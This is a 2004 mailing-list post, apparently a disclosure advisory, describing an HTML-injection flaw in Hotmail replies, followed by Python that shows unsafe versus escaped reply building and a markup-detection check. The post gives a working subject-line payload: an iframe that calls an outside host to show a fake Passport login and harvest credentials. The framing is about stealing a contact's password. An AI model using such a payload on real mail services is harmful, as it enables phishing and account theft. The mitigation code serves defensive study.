Message-ID: <200403181943.i2IJh1VN017772@web188.megawebservers.com>
From: 1 at malware.com (http-equiv@...ite.com)
Subject: HOTMAIL / PASSPORT: phishing expedition

Thursday, March 18, 2004

Unbelievably ridiculous insertion of arbitrary html into the Hotmail web based email account of your targeted "buddy". In order to gain your "little pal's" credentials, simply send him or her an email with an extra long subject like so:

heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle buddyheylittlebuddyheylittlebuddy heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle buddyheylittlebuddyheylittlebuddy heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle buddyheylittlebuddyheylittlebuddy heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle buddyheylittlebuddyheylittlebuddy heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle buddyheylittlebuddyheylittlebuddy heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle buddyheylittlebuddyheylittlebuddy heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle buddy<iframe src="http://www.malware.com/pithy.html">

Where our iframe points to window.open along with our trojanised Passport re-sign-in page. When your "chum" replies to your email, our iframe is rendered out of sight in the message body of the email and up goes our error window requesting him to login again. Only this time he'll be sending you his credentials.

Notes:

1. This is too pathetic for words. Cursory checking of all settings in Hotmail 'reply to' suggests there is no de-activation of html email when composing a reply.

2. Consideration was given to informing the owner of this particular web based mail service of this particular issue; however, we have not used such a poor service in recent years. So much so one can only suspect that such a slovenly operation is intentional in order to force account users to upgrade to the pay service:

   a) As of three hours from time of writing we are still awaiting receipt of emails into the Hotmail account from eight [that's numeral 8] different mail servers. Internal mail messages are instant, but three hours for external is completely unacceptable.

   b) Constant 'server is busy' errors. What does 40 billion dollars buy you today? More acreage around your acreage for more privacy.

   c) Initiation and re-activation of a dormant account of the free webmail account from the owner of this particular web based mail service requires a magnifying glass to see. If you don't have one, you're liable to select the pay-for service as it appears there are no other choices.

   d) Use Yahoo mail. Instant receipt of emails from any mail server all the time. Reply to html email subject filters tags.

End Call

-- 
http://www.malware.com
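The flaw the post describes is a webmail reply composer that copies the original message's subject into an HTML reply body without escaping it, so a tag in the subject is rendered by the recipient's browser. The following Python is an added illustration, not code from the post or from any webmail product: it shows the unsafe concatenation beside the escaped form a composer should use, plus a simple check a mail gateway could apply to flag subject lines that carry markup. The subject string, the placeholder URL and all function names are constructed for this example.

```python
import html
import re

# Constructed sample subject modelled on the pattern in the post: filler text
# followed by a raw HTML tag. The URL is a placeholder, not the original one.
SAMPLE_SUBJECT = ("heylittlebuddy" * 8) + '<iframe src="http://example.invalid/frame.html">'

# Matches anything that looks like an HTML start or end tag.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>?")

# Tags the composer itself writes; anything else in a reply came from untrusted input.
COMPOSER_TAGS = {"blockquote", "p", "b"}


def contains_markup(subject: str) -> bool:
    """True when a subject line carries HTML markup that would be rendered
    if copied verbatim into an HTML message body (gateway-side check)."""
    return TAG_RE.search(subject) is not None


def quoted_subject(subject: str) -> str:
    """Escape a subject so it is displayed as text, never parsed as markup,
    when the composer quotes it into an HTML reply."""
    return html.escape(subject, quote=True)


def build_reply_html_unsafe(original_subject: str, original_body_text: str) -> str:
    """The broken behaviour the post describes: untrusted header text is
    concatenated straight into the HTML reply body."""
    return (
        "<blockquote>"
        f"<p><b>Subject:</b> {original_subject}</p>"
        f"<p>{original_body_text}</p>"
        "</blockquote>"
    )


def build_reply_html(original_subject: str, original_body_text: str) -> str:
    """Hardened form: every field taken from the original message is escaped,
    so no tag from the original survives into the reply."""
    return (
        "<blockquote>"
        f"<p><b>Subject:</b> {quoted_subject(original_subject)}</p>"
        f"<p>{html.escape(original_body_text, quote=True)}</p>"
        "</blockquote>"
    )


def reply_is_clean(reply_html: str) -> bool:
    """Verify that the only tags present in a composed reply are the ones the
    composer writes itself."""
    tags = {t.lower() for t in re.findall(r"<\s*/?\s*([a-zA-Z]+)", reply_html)}
    return tags <= COMPOSER_TAGS


if __name__ == "__main__":
    print("subject carries markup:", contains_markup(SAMPLE_SUBJECT))
    unsafe = build_reply_html_unsafe(SAMPLE_SUBJECT, "see subject")
    safe = build_reply_html(SAMPLE_SUBJECT, "see subject")
    print("unsafe reply clean:", reply_is_clean(unsafe))
    print("safe reply clean:  ", reply_is_clean(safe))
    print(safe)
```

The `contains_markup` check is deliberately broad (any `<` followed by a letter); for a mail gateway a false positive on a subject such as "a<b" is a cheap price for catching every tag, while the composer-side fix in `build_reply_html` is the one that actually removes the problem, since escaping is unconditional rather than signature-based.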